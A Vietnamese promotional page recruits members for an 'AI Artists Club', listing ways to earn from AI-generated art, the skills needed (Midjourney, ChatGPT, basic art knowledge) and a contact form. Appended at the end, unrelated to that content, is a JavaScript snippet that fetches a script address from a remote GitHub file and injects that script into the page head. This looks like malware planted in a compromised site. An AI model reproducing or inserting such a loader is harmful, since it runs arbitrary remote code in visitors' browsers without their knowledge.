Khám Phá Cơ Hội Với Câu Lạc Bộ Nghệ Sĩ AI!

Trong thời đại số hoá, Trí tuệ nhân tạo (AI) đã không còn xa lạ và trở thành một trong những công cụ hỗ trợ mạnh mẽ cho nhiều lĩnh vực. Từ việc phân tích dữ liệu trong ngành tài chính, tới việc tối ưu hoá quy trình sản xuất trong công nghiệp và thậm chí là việc giúp các nghệ sĩ vẽ tranh hay tạo nhạc. AI đã mở ra một kỷ nguyên mới với biết bao cơ hội và sự sáng tạo.

Không chỉ giới hạn trong lĩnh vực nghiên cứu hoặc lập trình, bất kỳ ai cũng có thể trở thành một phần của thế giới AI. Dù bạn là một họa sĩ truyền thống, một người yêu âm nhạc, hay thậm chí chỉ là một người đam mê công nghệ, bạn đều có thể học AI và ứng dụng nó vào lĩnh vực của mình.

CƠ HỘI KIẾM TIỀN.

Những công việc mà bạn có thể kiếm được từ AI

  • Bán Tranh Điện Tử: Nghệ Sĩ AI có thể bán bản quyền của những tác phẩm nghệ thuật mà họ tạo ra trực tiếp trên các nền tảng trực tuyến của Thế giới (như ArtStation, DeviantArt…) hoặc trên chính Tranh Trang Trí . vn này.
  • NFT (Token Không Thể Thay Thế): NFT là một cách mới để Nghệ Sĩ AI có thể bán tác phẩm của 
    mình dưới dạng token số. Điều này giúp tác phẩm trở nên độc đáo và giá trị, thậm chí có thể tăng giá theo thời gian.
  • In Ấn và Bán Sản Phẩm Vật Lý: Nghệ Sĩ AI có thể in tranh của mình lên các sản phẩm vật lý như áo sơ mi, túi xách, poster, và bán chúng.
  • Cung Cấp Dịch Vụ Tùy Chỉnh: Khách hàng có thể yêu cầu tạo ra tranh nghệ thuật dựa trên trí tuệ nhân tạo dựa trên yêu cầu hoặc ý tưởng của họ.
  • Quảng cáo và Tiếp thị: Các công ty và thương hiệu có thể thuê Nghệ Sĩ AI để tạo ra nội dung độc đáo cho chiến dịch tiếp thị của họ: ví dụ thiết kế poster, ảnh quảng cáo sản phẩm.
  • Phần Mềm và Ứng Dụng: Nghệ Sĩ AI có thể phát triển hoặc hợp tác với các nhà phát triển để tạo ra phần mềm hoặc ứng dụng cho phép người dùng tự tạo ra tác phẩm nghệ thuật dựa trên AI.
  •  
  •  

CÂU LẠC BỘ NGHỆ SĨ AI

CLB của chúng tôi có sứ mệnh là giúp các bạn yêu AI và yêu Hội Họa kiếm được các thu nhập từ sự chăm chỉ của các bạn.
Chúng tôi có những Doanh nghiệp đang tìm kiếm nhân sự, hoặc muốn thuê thiết kế sản phẩm đồ họa – vì vậy chúng tôi sẽ liên tục tìm kiếm những người biết tạo ra các sản phẩm Mỹ Thuật từ AI – và kết nối với Doanh Nghiệp để đưa các sản phẩm vào ứng dụng kinh doanh, tạo ra lợi ích cho cả người Vẽ và Doanh Nghiệp.
Chúng tôi liên tục tổ chức các chương trình nâng cao kiến thức cho những người trong CLB. Để cùng nhau khám phá và nâng cao kỹ năng, từ đó mở ra những cơ hội kinh doanh và kiếm tiền từ sự hợp nhất giữa nghệ thuật và công nghệ.

BẠN PHẢI LÀM NHỮNG GÌ?

Để trở thành một Nghệ Sĩ AI thực sự, bạn không chỉ cần nắm vững những kiến thức cơ bản về AI mà còn phải tập trung vào việc phát triển tư duy sáng tạo của mình. Câu Lạc Bộ Nghệ Sĩ AI sẽ cung cấp những bài giảng, workshop, và sự hướng dẫn từ các chuyên gia hàng đầu. Qua đó, bạn có thể nắm bắt được cách thức ứng dụng AI vào việc tạo ra những tác phẩm nghệ thuật, và sau đó biến chúng thành một sản phẩm có giá trị thương mại.
Hãy gia nhập Câu Lạc Bộ Nghệ Sĩ AI ngay hôm nay để cùng chúng tôi mở ra một trang mới trong lĩnh vực nghệ thuật và AI. Cùng nhau, chúng ta sẽ tạo nên một tương lai sáng ngời và đầy màu sắc!

KỸ NĂNG CẦN CÓ:

Những kỹ năng bạn cần có:

  • Biết cách dùng ứng dụng vẽ AI: vd Midjourney
  • Biết cách sử dụng Chat GPT: để hỏi về kiến thức, tạo prompt…
  • Có hiểu biết Mỹ thuật tối thiểu (bạn không cần trong nghề Mỹ Thuật, nhưng cần có 1 chút kiến thức về Mỹ Thuật để có thể hiểu được các đề bài): Hiểu về tông màu, đường nét, cảm xúc màu, thể loại tranh, kiến thức hội họa v..v
  • Có các kiến thức về Mỹ thuật hay Trang trí nội thất

Hiểu biết ở đây không phải bắt buộc phải học trường Mỹ Thuật hay chuyên ngành mỹ thuật, nhưng bạn phải có nền tảng để hiểu sơ bộ được những khái niệm cơ bản về Mỹ thuật như: mầu sắc, đường nét, tông màu, thể loại tranh vẽ (sơn dầu, lụa…), hoặc các phong cách vẽ cơ bản: tĩnh vật, v..v. Khi hiểu các điều đó rồi thì bạn sẽ đáp ứng nhu cầu với khách hàng 1 cách hiệu quả hơn.
Dĩ nhiên, hiểu biết cơ bản là điều kiện “Cần” thôi, còn để “Đủ” thì bạn buộc phải có những năng lực tìm tòi tự học, và biết cách ứng dụng công nghệ vào công việc.

AI PHÙ HỢP

  • Nên là người có chút kiến thức về Mỹ Thuật (đã từng học Mỹ thuật hoặc Kiến trúc): thì chúng ta sẽ có những khái niệm chung với nhau về lĩnh vực Mỹ Thuật dễ làm việc hơn.
  • Bạn có thể đang có việc làm: vì công việc này không chiếm nhiều thời gian nên bạn có thể làm thêm.
  • Bạn có thể ở bất kỳ đâu: Do đây là 1 mô hình CLB và làm việc từ xa nên bạn có thể ở bất kỳ nơi đâu. Chúng ta học qua Zoom, làm việc từ xa.

LIÊN HỆ:

Cuối cùng, nếu bạn muốn có các việc làm về Tranh Vẽ AI, hoặc muốn tạo ra thu nhập từ những sản phẩm thiết kế AI của bạn, hãy liên hệ với chúng tôi nhé!

Hãy liên hệ với chúng tôi qua link này: https://forms.gle/Chh5RZiVVrkemow19

(var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)